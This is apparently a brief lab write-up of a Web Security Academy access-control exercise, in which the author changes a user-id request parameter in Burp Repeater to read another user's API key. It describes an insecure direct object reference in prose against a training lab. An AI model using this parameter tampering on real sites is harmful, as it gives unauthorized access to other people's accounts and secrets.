4.3.web user id controlled by request parameter(Web Security Academy)

Web Security Academy >> Access control >> Lab

The goal is to get the API key of user carlosĀ :

We will log in with wiener:peterĀ .

So to get the API Key, we must go to Carlosā€™s pageĀ .

If you notice in the URL, the user ID appears as the user name, so we can change the name to the user CarlosĀ .

We need to change the id from wiener to carlos

Therefore, we will send the request to the repeaterĀ :

Change the IDĀ , And send the requestĀ :

The response came and he has already registered using the user carlos, so search in the search box for ā€œAPIā€.

Here we areĀ .

Congratulations, you solved theĀ lab!

We could have changed the ID from wiener to carlos inside the URL and see what happensĀ , Sometimes it works, but on this site it did not work, so we logged in to the user Carlos, using burpĀ .

See you soon in other reportsā€¦.!!

Abdelwahab_Shandy

AS_Cyber